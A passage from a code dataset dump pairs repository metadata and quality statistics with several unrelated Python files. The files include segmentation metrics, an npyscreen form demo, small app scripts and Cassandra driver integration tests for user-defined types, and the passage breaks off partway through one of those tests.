| 19 | 37 | 0.842105 | 5 | 38 | 6.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 38 | 1 | 38 | 38 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0bf85ba6f810558cbed2ab6f477cf7b1c27fc89d | 63 | py | Python | models/utils/__init__.py | JackPlayer/nhl-salary-prediction | a32d9bc1468e671f60b81076df69a47f3910ae6c | [
"MIT"
] | null | null | null | models/utils/__init__.py | JackPlayer/nhl-salary-prediction | a32d9bc1468e671f60b81076df69a47f3910ae6c | [
"MIT"
] | null | null | null | models/utils/__init__.py | JackPlayer/nhl-salary-prediction | a32d9bc1468e671f60b81076df69a47f3910ae6c | [
"MIT"
] | null | null | null | """
utils module
"""
from .feature_list import feature_list | 15.75 | 38 | 0.714286 | 8 | 63 | 5.375 | 0.75 | 0.511628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174603 | 63 | 4 | 38 | 15.75 | 0.826923 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f099905ba86043f73a6df3a4319e7e15837e8887 | 3,556 | py | Python | metric.py | Yukei7/Multimodal-Segmentation-Network | 0a38aa8bbd2eb87e28209c810438248c0464a240 | [
"MIT"
] | null | null | null | metric.py | Yukei7/Multimodal-Segmentation-Network | 0a38aa8bbd2eb87e28209c810438248c0464a240 | [
"MIT"
] | null | null | null | metric.py | Yukei7/Multimodal-Segmentation-Network | 0a38aa8bbd2eb87e28209c810438248c0464a240 | [
"MIT"
] | null | null | null | import numpy as np
import torch
def dice_coef(y_pred: torch.Tensor,
y_true: torch.Tensor,
ts: float = 0.5,
eps: float = 1e-9):
assert y_pred.shape == y_true.shape
scores = []
n_samples = y_pred.shape[0]
preds = (y_pred > ts).float()
for i in range(n_samples):
pred = preds[i]
true = y_true[i]
intersect = 2.0 * (true * pred).sum()
union = true.sum() + pred.sum()
if true.sum() == 0 and pred.sum() == 0:
scores.append(1.0)
else:
scores.append((intersect + eps) / union)
return np.mean(scores)
def jaccard_coef(y_pred: torch.Tensor,
y_true: torch.Tensor,
ts: float = 0.5,
eps: float = 1e-9):
assert y_pred.shape == y_true.shape
scores = []
n_samples = y_pred.shape[0]
preds = (y_pred > ts).float()
for i in range(n_samples):
pred = preds[i]
true = y_true[i]
intersect = (pred * true).sum()
union = (true.sum() + pred.sum()) - intersect + eps
if true.sum() == 0 and pred.sum() == 0:
scores.append(1.0)
else:
scores.append((intersect + eps) / union)
return np.mean(scores)
def dice_coef_pc(probabilities: np.ndarray,
truth: np.ndarray,
treshold: float = 0.5,
eps: float = 1e-9,
classes: list = ['WT', 'TC', 'ET']) -> dict:
scores = {key: list() for key in classes}
num = probabilities.shape[0]
num_classes = probabilities.shape[1]
predictions = (probabilities >= treshold).astype(np.float32)
assert (predictions.shape == truth.shape)
for i in range(num):
for class_ in range(num_classes):
prediction = predictions[i][class_]
truth_ = truth[i][class_]
intersection = 2.0 * (truth_ * prediction).sum()
union = truth_.sum() + prediction.sum()
if truth_.sum() == 0 and prediction.sum() == 0:
scores[classes[class_]].append(1.0)
else:
scores[classes[class_]].append((intersection + eps) / union)
return scores
def jaccard_coef_pc(probabilities: np.ndarray,
truth: np.ndarray,
treshold: float = 0.5,
eps: float = 1e-9,
classes: list = ['WT', 'TC', 'ET']) -> dict:
"""
Calculate Jaccard index for data batch and for each class.
Params:
probobilities: model outputs after activation function.
truth: model targets.
threshold: threshold for probabilities.
eps: additive to refine the estimate.
classes: list with name classes.
Returns: dict with jaccard scores for each class."
"""
scores = {key: list() for key in classes}
num = probabilities.shape[0]
num_classes = probabilities.shape[1]
predictions = (probabilities >= treshold).astype(np.float32)
assert (predictions.shape == truth.shape)
for i in range(num):
for class_ in range(num_classes):
prediction = predictions[i][class_]
truth_ = truth[i][class_]
intersection = (prediction * truth_).sum()
union = (prediction.sum() + truth_.sum()) - intersection + eps
if truth_.sum() == 0 and prediction.sum() == 0:
scores[classes[class_]].append(1.0)
else:
scores[classes[class_]].append((intersection + eps) / union)
return scores
| 34.862745 | 76 | 0.551181 | 427 | 3,556 | 4.482436 | 0.192037 | 0.020899 | 0.014629 | 0.020899 | 0.77116 | 0.77116 | 0.748171 | 0.748171 | 0.748171 | 0.748171 | 0 | 0.019127 | 0.323678 | 3,556 | 101 | 77 | 35.207921 | 0.776715 | 0.092801 | 0 | 0.825 | 0 | 0 | 0.003771 | 0 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.05 | false | 0 | 0.025 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f0be8f77f423547c26af9fd70d752da70a0c2036 | 186 | py | Python | test.py | vivekraghu17/Twitter-Sentiment-Analysis- | 7583f6cf9db848830e82f0885755b98a2dd21c2d | [
"Unlicense"
] | 1 | 2018-11-19T14:14:24.000Z | 2018-11-19T14:14:24.000Z | test.py | vivekraghu17/Twitter-Sentiment-Analysis- | 7583f6cf9db848830e82f0885755b98a2dd21c2d | [
"Unlicense"
] | null | null | null | test.py | vivekraghu17/Twitter-Sentiment-Analysis- | 7583f6cf9db848830e82f0885755b98a2dd21c2d | [
"Unlicense"
] | null | null | null | import sentiment_mod as s
print(s.sentiment("This is utter flop movie and not worth the money "))
print(s.sentiment("One of the best sentimental and thriller movies i have ever seen"))
| 37.2 | 86 | 0.774194 | 33 | 186 | 4.333333 | 0.787879 | 0.083916 | 0.20979 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150538 | 186 | 4 | 87 | 46.5 | 0.905063 | 0 | 0 | 0 | 0 | 0 | 0.607527 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
9bd539dc90a283fab2a48056854fbe17837d92e6 | 124 | py | Python | flask_images/__init__.py | Club-Alpin-Annecy/Flask-Images | 5c0d4028d3e6e04769ab7bb68258c02cd4769406 | [
"BSD-3-Clause"
] | 75 | 2015-01-07T20:25:53.000Z | 2021-11-01T17:49:00.000Z | flask_images/__init__.py | Club-Alpin-Annecy/Flask-Images | 5c0d4028d3e6e04769ab7bb68258c02cd4769406 | [
"BSD-3-Clause"
] | 30 | 2015-01-07T19:57:58.000Z | 2021-08-31T09:14:33.000Z | flask_images/__init__.py | Club-Alpin-Annecy/Flask-Images | 5c0d4028d3e6e04769ab7bb68258c02cd4769406 | [
"BSD-3-Clause"
] | 46 | 2015-01-14T03:09:03.000Z | 2022-02-01T20:18:50.000Z | from .core import Images, resized_img_src, resized_img_size, resized_img_attrs, resized_img_tag
from .size import ImageSize
| 41.333333 | 95 | 0.854839 | 20 | 124 | 4.9 | 0.55 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 124 | 2 | 96 | 62 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
501956d5f6d3fecc12a6a351e24e95f90a3f027d | 1,437 | py | Python | examples/memtest.py | tescalada/npyscreen-restructure | 0833bbbdec18439182f102d2147f3756fa98aadd | [
"BSD-2-Clause"
] | 2 | 2015-01-12T14:47:19.000Z | 2018-10-03T09:27:22.000Z | examples/memtest.py | tescalada/npyscreen-restructure | 0833bbbdec18439182f102d2147f3756fa98aadd | [
"BSD-2-Clause"
] | null | null | null | examples/memtest.py | tescalada/npyscreen-restructure | 0833bbbdec18439182f102d2147f3756fa98aadd | [
"BSD-2-Clause"
] | 1 | 2020-03-20T20:19:33.000Z | 2020-03-20T20:19:33.000Z | #!/usr/bin/env python
import npyscreen
import EXAMPLE
#def Mainloop(scr):
# while 1:
# sampleform()
#
#def sampleform():
# F = npyscreen.Form(name = "Welcome to Npyscreen")
# t = F.add(npyscreen.TitleText, name = "Text:")
# p = F.add(npyscreen.TitlePassword, name = "Password:")
# fn = F.add(npyscreen.TitleFilename, name = "Filename:")
# s = F.add(npyscreen.TitleSlider, out_of=12, name = "Slider")
# ml= F.add(npyscreen.MultiLineEdit, value = "try typing here! Mutiline text, press ^R to reformat.", max_height=4)
# ms= F.add(npyscreen.MultiSelect, max_height=4, value = [1,], values = ["Option1","Option2","Option3"], scroll_exit=True)
class TestMem(npyscreen.NPSApp):
def main(self):
F = npyscreen.Form(name = "Welcome to Npyscreen")
t = F.add(npyscreen.TitleText, name = "Text:")
p = F.add(npyscreen.TitlePassword, name = "Password:")
fn = F.add(npyscreen.TitleFilename, name = "Filename:")
s = F.add(npyscreen.TitleSlider, out_of=12, name = "Slider")
ml= F.add(npyscreen.MultiLineEdit, value = "try typing here! Mutiline text, press ^R to reformat.", max_height=3, rely=7)
ms= F.add(npyscreen.MultiSelect, max_height=4, value = [1,], values = ["Option1","Option2","Option3"], scroll_exit=True)
F.display()
if __name__ == "__main__":
Test = TestMem()
Test.run()
while 1:
Test = TestMem()
Test.main()
| 38.837838 | 129 | 0.637439 | 186 | 1,437 | 4.83871 | 0.365591 | 0.053333 | 0.173333 | 0.04 | 0.786667 | 0.786667 | 0.786667 | 0.786667 | 0.786667 | 0.786667 | 0 | 0.016522 | 0.199722 | 1,437 | 36 | 130 | 39.916667 | 0.766087 | 0.425887 | 0 | 0.111111 | 0 | 0 | 0.161529 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0.055556 | 0.111111 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
501d0d7b7cd1729dbcb7bc36c20fcd11b26d5097 | 95 | py | Python | fortniteversus/bin/db_create.py | oliverbarreto/FortniteVS | c09f0514558912d9d058552dc1295ddfa266132c | [
"Apache-2.0"
] | 1 | 2019-07-02T19:53:04.000Z | 2019-07-02T19:53:04.000Z | fortniteversus/bin/db_create.py | oliverbarreto/FortniteVS | c09f0514558912d9d058552dc1295ddfa266132c | [
"Apache-2.0"
] | null | null | null | fortniteversus/bin/db_create.py | oliverbarreto/FortniteVS | c09f0514558912d9d058552dc1295ddfa266132c | [
"Apache-2.0"
] | null | null | null | from fortniteversus import db
from fortniteversus.models import StoreItem
db.create_all()
| 10.555556 | 43 | 0.810526 | 12 | 95 | 6.333333 | 0.666667 | 0.473684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147368 | 95 | 8 | 44 | 11.875 | 0.938272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
acdb42a18331e099bd1333fa1de92a7c4a7bfe04 | 25,613 | py | Python | tests/integration/standard/test_udts.py | HackerEarth/cassandra-python-driver | 65fca43785046f88d7aabac3a567c52f8a3e24cd | [
"Apache-2.0"
] | 1 | 2017-10-17T11:30:52.000Z | 2017-10-17T11:30:52.000Z | tests/integration/standard/test_udts.py | HackerEarth/cassandra-python-driver | 65fca43785046f88d7aabac3a567c52f8a3e24cd | [
"Apache-2.0"
] | null | null | null | tests/integration/standard/test_udts.py | HackerEarth/cassandra-python-driver | 65fca43785046f88d7aabac3a567c52f8a3e24cd | [
"Apache-2.0"
] | null | null | null | # Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cassandra.query import dict_factory
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
import logging
log = logging.getLogger(__name__)
from collections import namedtuple
from cassandra.cluster import Cluster, UserTypeDoesNotExist
from tests.integration import get_server_versions, use_singledc, PROTOCOL_VERSION
from tests.integration.datatype_utils import get_sample, get_nonprim_sample,\
DATA_TYPE_PRIMITIVES, DATA_TYPE_NON_PRIMITIVE_NAMES
def setup_module():
use_singledc()
class TypeTests(unittest.TestCase):
def setUp(self):
if PROTOCOL_VERSION < 3:
raise unittest.SkipTest("v3 protocol is required for UDT tests")
self._cass_version, self._cql_version = get_server_versions()
def test_unprepared_registered_udts(self):
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
s.execute("""
CREATE KEYSPACE udt_test_unprepared_registered
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_unprepared_registered")
s.execute("CREATE TYPE user (age int, name text)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
User = namedtuple('user', ('age', 'name'))
c.register_user_type("udt_test_unprepared_registered", "user", User)
s.execute("INSERT INTO mytable (a, b) VALUES (%s, %s)", (0, User(42, 'bob')))
result = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual(42, row.b.age)
self.assertEqual('bob', row.b.name)
self.assertTrue(type(row.b) is User)
# use the same UDT name in a different keyspace
s.execute("""
CREATE KEYSPACE udt_test_unprepared_registered2
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_unprepared_registered2")
s.execute("CREATE TYPE user (state text, is_cool boolean)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
User = namedtuple('user', ('state', 'is_cool'))
c.register_user_type("udt_test_unprepared_registered2", "user", User)
s.execute("INSERT INTO mytable (a, b) VALUES (%s, %s)", (0, User('Texas', True)))
result = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual('Texas', row.b.state)
self.assertEqual(True, row.b.is_cool)
self.assertTrue(type(row.b) is User)
c.shutdown()
def test_register_before_connecting(self):
User1 = namedtuple('user', ('age', 'name'))
User2 = namedtuple('user', ('state', 'is_cool'))
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
s.execute("""
CREATE KEYSPACE udt_test_register_before_connecting
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_register_before_connecting")
s.execute("CREATE TYPE user (age int, name text)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
s.execute("""
CREATE KEYSPACE udt_test_register_before_connecting2
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_register_before_connecting2")
s.execute("CREATE TYPE user (state text, is_cool boolean)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
# now that types are defined, shutdown and re-create Cluster
c.shutdown()
c = Cluster(protocol_version=PROTOCOL_VERSION)
c.register_user_type("udt_test_register_before_connecting", "user", User1)
c.register_user_type("udt_test_register_before_connecting2", "user", User2)
s = c.connect()
s.set_keyspace("udt_test_register_before_connecting")
s.execute("INSERT INTO mytable (a, b) VALUES (%s, %s)", (0, User1(42, 'bob')))
result = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual(42, row.b.age)
self.assertEqual('bob', row.b.name)
self.assertTrue(type(row.b) is User1)
# use the same UDT name in a different keyspace
s.set_keyspace("udt_test_register_before_connecting2")
s.execute("INSERT INTO mytable (a, b) VALUES (%s, %s)", (0, User2('Texas', True)))
result = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual('Texas', row.b.state)
self.assertEqual(True, row.b.is_cool)
self.assertTrue(type(row.b) is User2)
c.shutdown()
def test_prepared_unregistered_udts(self):
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
s.execute("""
CREATE KEYSPACE udt_test_prepared_unregistered
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_prepared_unregistered")
s.execute("CREATE TYPE user (age int, name text)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
User = namedtuple('user', ('age', 'name'))
insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
s.execute(insert, (0, User(42, 'bob')))
select = s.prepare("SELECT b FROM mytable WHERE a=?")
result = s.execute(select, (0,))
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual(42, row.b.age)
self.assertEqual('bob', row.b.name)
# use the same UDT name in a different keyspace
s.execute("""
CREATE KEYSPACE udt_test_prepared_unregistered2
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_prepared_unregistered2")
s.execute("CREATE TYPE user (state text, is_cool boolean)")
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
User = namedtuple('user', ('state', 'is_cool'))
insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
s.execute(insert, (0, User('Texas', True)))
select = s.prepare("SELECT b FROM mytable WHERE a=?")
result = s.execute(select, (0,))
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual('Texas', row.b.state)
self.assertEqual(True, row.b.is_cool)
c.shutdown()
def test_prepared_registered_udts(self):
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
s.execute("""
CREATE KEYSPACE udt_test_prepared_registered
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_prepared_registered")
s.execute("CREATE TYPE user (age int, name text)")
User = namedtuple('user', ('age', 'name'))
c.register_user_type("udt_test_prepared_registered", "user", User)
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
s.execute(insert, (0, User(42, 'bob')))
select = s.prepare("SELECT b FROM mytable WHERE a=?")
result = s.execute(select, (0,))
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual(42, row.b.age)
self.assertEqual('bob', row.b.name)
self.assertTrue(type(row.b) is User)
# use the same UDT name in a different keyspace
s.execute("""
CREATE KEYSPACE udt_test_prepared_registered2
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("udt_test_prepared_registered2")
s.execute("CREATE TYPE user (state text, is_cool boolean)")
User = namedtuple('user', ('state', 'is_cool'))
c.register_user_type("udt_test_prepared_registered2", "user", User)
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
insert = s.prepare("INSERT INTO mytable (a, b) VALUES (?, ?)")
s.execute(insert, (0, User('Texas', True)))
select = s.prepare("SELECT b FROM mytable WHERE a=?")
result = s.execute(select, (0,))
self.assertEqual(1, len(result))
row = result[0]
self.assertEqual('Texas', row.b.state)
self.assertEqual(True, row.b.is_cool)
self.assertTrue(type(row.b) is User)
c.shutdown()
def test_udts_with_nulls(self):
"""
Test UDTs with null and empty string fields.
"""
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
s.execute("""
CREATE KEYSPACE test_udts_with_nulls
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
s.set_keyspace("test_udts_with_nulls")
s.execute("CREATE TYPE user (a text, b int, c uuid, d blob)")
User = namedtuple('user', ('a', 'b', 'c', 'd'))
c.register_user_type("test_udts_with_nulls", "user", User)
s.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
insert = s.prepare("INSERT INTO mytable (a, b) VALUES (0, ?)")
s.execute(insert, [User(None, None, None, None)])
results = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual((None, None, None, None), results[0].b)
select = s.prepare("SELECT b FROM mytable WHERE a=0")
self.assertEqual((None, None, None, None), s.execute(select)[0].b)
# also test empty strings
s.execute(insert, [User('', None, None, '')])
results = s.execute("SELECT b FROM mytable WHERE a=0")
self.assertEqual(('', None, None, ''), results[0].b)
self.assertEqual(('', None, None, ''), s.execute(select)[0].b)
c.shutdown()
def test_udt_sizes(self):
"""
Test for ensuring extra-lengthy udts are handled correctly.
"""
if self._cass_version < (2, 1, 0):
raise unittest.SkipTest("The tuple type was introduced in Cassandra 2.1")
MAX_TEST_LENGTH = 16384
EXTENDED_QUERY_TIMEOUT = 60
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
s.execute("""CREATE KEYSPACE test_udt_sizes
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1'}""")
s.set_keyspace("test_udt_sizes")
# create the seed udt, increase timeout to avoid the query failure on slow systems
s.execute("CREATE TYPE lengthy_udt ({})"
.format(', '.join(['v_{} int'.format(i)
for i in range(MAX_TEST_LENGTH)])), timeout=EXTENDED_QUERY_TIMEOUT)
# create a table with multiple sizes of nested udts
# no need for all nested types, only a spot checked few and the largest one
s.execute("CREATE TABLE mytable ("
"k int PRIMARY KEY, "
"v frozen<lengthy_udt>)", timeout=EXTENDED_QUERY_TIMEOUT)
# create and register the seed udt type
udt = namedtuple('lengthy_udt', tuple(['v_{}'.format(i) for i in range(MAX_TEST_LENGTH)]))
c.register_user_type("test_udt_sizes", "lengthy_udt", udt)
# verify inserts and reads
for i in (0, 1, 2, 3, MAX_TEST_LENGTH):
# create udt
params = [j for j in range(i)] + [None for j in range(MAX_TEST_LENGTH - i)]
created_udt = udt(*params)
# write udt
s.execute("INSERT INTO mytable (k, v) VALUES (0, %s)", (created_udt,))
# verify udt was written and read correctly, increase timeout to avoid the query failure on slow systems
result = s.execute("SELECT v FROM mytable WHERE k=0", timeout=EXTENDED_QUERY_TIMEOUT)[0]
self.assertEqual(created_udt, result.v)
c.shutdown()
def nested_udt_helper(self, udts, i):
"""
Helper for creating nested udts.
"""
if i == 0:
return udts[0](42, 'Bob')
else:
return udts[i](self.nested_udt_helper(udts, i - 1))
def test_nested_registered_udts(self):
"""
Test for ensuring nested udts are handled correctly.
"""
if self._cass_version < (2, 1, 0):
raise unittest.SkipTest("The tuple type was introduced in Cassandra 2.1")
MAX_NESTING_DEPTH = 16
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
# set the row_factory to dict_factory for programmatically accessing values
s.row_factory = dict_factory
s.execute("""CREATE KEYSPACE test_nested_registered_udts
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1'}""")
s.set_keyspace("test_nested_registered_udts")
# create the seed udt
s.execute("CREATE TYPE depth_0 (age int, name text)")
# create the nested udts
for i in range(MAX_NESTING_DEPTH):
s.execute("CREATE TYPE depth_{} (value frozen<depth_{}>)".format(i + 1, i))
# create a table with multiple sizes of nested udts
# no need for all nested types, only a spot checked few and the largest one
s.execute("CREATE TABLE mytable ("
"k int PRIMARY KEY, "
"v_0 frozen<depth_0>, "
"v_1 frozen<depth_1>, "
"v_2 frozen<depth_2>, "
"v_3 frozen<depth_3>, "
"v_{0} frozen<depth_{0}>)".format(MAX_NESTING_DEPTH))
# create the udt container
udts = []
# create and register the seed udt type
udt = namedtuple('depth_0', ('age', 'name'))
udts.append(udt)
c.register_user_type("test_nested_registered_udts", "depth_0", udts[0])
# create and register the nested udt types
for i in range(MAX_NESTING_DEPTH):
udt = namedtuple('depth_{}'.format(i + 1), ('value'))
udts.append(udt)
c.register_user_type("test_nested_registered_udts", "depth_{}".format(i + 1), udts[i + 1])
# verify inserts and reads
for i in (0, 1, 2, 3, MAX_NESTING_DEPTH):
# create udt
udt = self.nested_udt_helper(udts, i)
# write udt
s.execute("INSERT INTO mytable (k, v_%s) VALUES (0, %s)", (i, udt))
# verify udt was written and read correctly
result = s.execute("SELECT v_%s FROM mytable WHERE k=0", (i,))[0]
self.assertEqual(udt, result['v_%s' % i])
c.shutdown()
def test_nested_unregistered_udts(self):
"""
Test for ensuring nested unregistered udts are handled correctly.
"""
if self._cass_version < (2, 1, 0):
raise unittest.SkipTest("The tuple type was introduced in Cassandra 2.1")
MAX_NESTING_DEPTH = 16
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
# set the row_factory to dict_factory for programmatically accessing values
s.row_factory = dict_factory
s.execute("""CREATE KEYSPACE test_nested_unregistered_udts
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1'}""")
s.set_keyspace("test_nested_unregistered_udts")
# create the seed udt
s.execute("CREATE TYPE depth_0 (age int, name text)")
# create the nested udts
for i in range(MAX_NESTING_DEPTH):
s.execute("CREATE TYPE depth_{} (value frozen<depth_{}>)".format(i + 1, i))
# create a table with multiple sizes of nested udts
# no need for all nested types, only a spot checked few and the largest one
s.execute("CREATE TABLE mytable ("
"k int PRIMARY KEY, "
"v_0 frozen<depth_0>, "
"v_1 frozen<depth_1>, "
"v_2 frozen<depth_2>, "
"v_3 frozen<depth_3>, "
"v_{0} frozen<depth_{0}>)".format(MAX_NESTING_DEPTH))
# create the udt container
udts = []
# create and register the seed udt type
udt = namedtuple('depth_0', ('age', 'name'))
udts.append(udt)
# create and register the nested udt types
for i in range(MAX_NESTING_DEPTH):
udt = namedtuple('depth_{}'.format(i + 1), ('value'))
udts.append(udt)
# verify inserts and reads
for i in (0, 1, 2, 3, MAX_NESTING_DEPTH):
# create udt
udt = self.nested_udt_helper(udts, i)
# write udt
insert = s.prepare("INSERT INTO mytable (k, v_{0}) VALUES (0, ?)".format(i))
s.execute(insert, (udt,))
# verify udt was written and read correctly
result = s.execute("SELECT v_%s FROM mytable WHERE k=0", (i,))[0]
self.assertEqual(udt, result['v_%s' % i])
c.shutdown()
def test_nested_registered_udts_with_different_namedtuples(self):
"""
Test for ensuring nested udts are handled correctly when the
created namedtuples are use names that are different the cql type.
Future improvement: optimize these three related tests using a single
helper method to cut down on code repetition.
"""
if self._cass_version < (2, 1, 0):
raise unittest.SkipTest("The tuple type was introduced in Cassandra 2.1")
MAX_NESTING_DEPTH = 16
c = Cluster(protocol_version=PROTOCOL_VERSION)
s = c.connect()
# set the row_factory to dict_factory for programmatically accessing values
s.row_factory = dict_factory
s.execute("""CREATE KEYSPACE different_namedtuples
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1'}""")
s.set_keyspace("different_namedtuples")
# create the seed udt
s.execute("CREATE TYPE depth_0 (age int, name text)")
# create the nested udts
for i in range(MAX_NESTING_DEPTH):
s.execute("CREATE TYPE depth_{} (value frozen<depth_{}>)".format(i + 1, i))
# create a table with multiple sizes of nested udts
# no need for all nested types, only a spot checked few and the largest one
s.execute("CREATE TABLE mytable ("
"k int PRIMARY KEY, "
"v_0 frozen<depth_0>, "
"v_1 frozen<depth_1>, "
"v_2 frozen<depth_2>, "
"v_3 frozen<depth_3>, "
"v_{0} frozen<depth_{0}>)".format(MAX_NESTING_DEPTH))
# create the udt container
udts = []
# create and register the seed udt type
udt = namedtuple('level_0', ('age', 'name'))
udts.append(udt)
c.register_user_type("different_namedtuples", "depth_0", udts[0])
# create and register the nested udt types
for i in range(MAX_NESTING_DEPTH):
udt = namedtuple('level_{}'.format(i + 1), ('value'))
udts.append(udt)
c.register_user_type("different_namedtuples", "depth_{}".format(i + 1), udts[i + 1])
# verify inserts and reads
for i in (0, 1, 2, 3, MAX_NESTING_DEPTH):
# create udt
udt = self.nested_udt_helper(udts, i)
# write udt
s.execute("INSERT INTO mytable (k, v_%s) VALUES (0, %s)", (i, udt))
# verify udt was written and read correctly
